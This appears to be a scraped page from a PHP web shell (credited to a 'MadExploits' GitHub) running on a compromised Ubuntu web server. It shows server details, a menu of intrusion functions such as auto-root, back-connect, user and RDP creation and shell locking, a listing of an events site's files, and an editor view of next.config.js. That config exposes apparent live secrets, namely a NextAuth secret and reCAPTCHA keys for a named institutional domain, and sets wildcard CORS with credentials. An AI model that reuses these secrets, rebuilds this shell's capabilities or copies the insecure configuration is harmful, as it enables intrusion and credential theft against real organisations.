Linux websever 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 192.168.3.70 | : 192.168.1.99
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.23
urlab
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
events /
[ HOME SHELL ]
Name
Size
Permission
Action
.next
[ DIR ]
drwxrwxr-x
node_modules
[ DIR ]
drwxrwxr-x
public
[ DIR ]
drwxrwxr-x
src
[ DIR ]
drwxrwxr-x
.env.development.local
883
B
-rw-rw-r--
.eslintrc.json
40
B
-rw-rw-r--
.gitignore
488
B
-rw-rw-r--
README.md
1.35
KB
-rw-rw-r--
components.json
348
B
-rw-rw-r--
ecosystem.config.js
344
B
-rw-rw-r--
jsconfig.json
77
B
-rw-rw-r--
next.config.js
1.08
KB
-rw-rw-r--
nohup.out
281.42
KB
-rw-------
package-lock.json
372.27
KB
-rw-rw-r--
package.json
1.67
KB
-rw-rw-r--
postcss.config.js
82
B
-rw-rw-r--
tailwind.config.js
2.09
KB
-rw-rw-r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : next.config.js
/** @type {import('next').NextConfig} */ const nextConfig = { reactStrictMode: true, images: { domains: ["img.icons8.com", "iiitd.ac.in"], }, env:{ NEXTAUTH_URL:"http://events.iiitd.edu.in/", NEXTAUTH_SECRET:"8dfsaa9sf77f8as7f9af8df7aj2h52m5vg5d", SITE_KEY:"6LdEsuspAAAAAMg9BdEU3P6e7kfWLzWA-_9aOr1C", SECRET_KEY:"6LdEsuspAAAAAEZPuI88vk_X7tFAVGNFeZwxS93H" }, async headers() { return [ { // matching all API routes source: "/api/:path*", headers: [ { key: "Access-Control-Allow-Credentials", value: "true" }, { key: "Access-Control-Allow-Origin", value: "*" }, { key: "Access-Control-Allow-Methods", value: "GET,OPTIONS,PATCH,DELETE,POST,PUT", }, { key: "Access-Control-Allow-Headers", value: "X-CSRF-Token, X-Requested-With, Accept, Accept-Version, Content-Length, Content-MD5, Content-Type, Date, X-Api-Version", }, ], }, ]; }, }; module.exports = nextConfig
Close